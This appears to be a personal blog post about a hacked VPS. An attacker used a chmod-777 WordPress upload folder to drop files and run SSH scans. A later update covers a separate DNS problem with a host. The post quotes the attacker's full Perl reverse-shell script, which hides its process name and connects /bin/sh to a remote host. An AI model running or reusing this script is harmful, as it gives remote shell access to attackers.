Last time this sort of odd situation occured was way back in 2003 when I had my h4x3d.com website(s) hosted in Germany. People were clueless, but level3 administrators figured it out. WordPress requires some folders to be CHMODDED to 777, read,write, execute all access basically. One of those folders is the wp-content/upload folder. Different programmes, because not only wordpress is to “blame”, such as coppermine require similar settings for full functionality.

Anyway – someone from switzerland (bless the logs) had uploaded a perl script to one of the domains and was running excessive ssh scans. This was also why the VPS slowed down and became unresponsive. Since I was not able to restart it manually, I got in contact with my new VPS support at SolarVPS – they identified the scans and with my CHMOD 777 clue dropped in, some rootkit scans and other audits they were able to chuck out those unwanted visitors and files within an hour.

This is frankly speaking a support everyone is looking for. At zone.net one had varying support quality due to apparent offshoring of support to people that had no clue and merely redirected requests to the level3 techs. It seems like level3 techs reside at solarvps, else I wonder how they were able to almost instantianiously sort out my problems. I will have to find a solution to the upload folder problem, eventually move it outside the httpdocs? Any advice or comments?

Below you find one of the scripts that was used to call home and cause havoc, I believe this is only the “gateway” and “door opener” for more destructive commands to be executed:

c.txt
#!/usr/bin/perl
use Socket;
$cmd="lpd";
$system='/bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Sorry for any inconvenience!

We are now on nehi server and no longer on the laggy clamato. Thanks to the great time-off my advertisement earnings have been massive: 0,78 cent in 24 hours. Awesome!

UPDATE

Seems like they (dreamhost.com) found out what was the loose screw:

I apologize for the inconvenience this has caused you.	It appears there
was an issue with DNS, and our servers were still pointing to the old
webserver, instead of the new one you were moved to.

I have manually pushed the DNS for all your domains, but it will still
take up to 24 hours for your sites to be fully working.  Some of your
sites may have already propagated, but some will still display the
'bad_httpd_conf" error.

If you continue to experience problems after 24 hours, let me know!  You
can email me directly at (name deleted)@dreamhost.com, or simply reply to this
ticket.

Thanks!

(name deleted)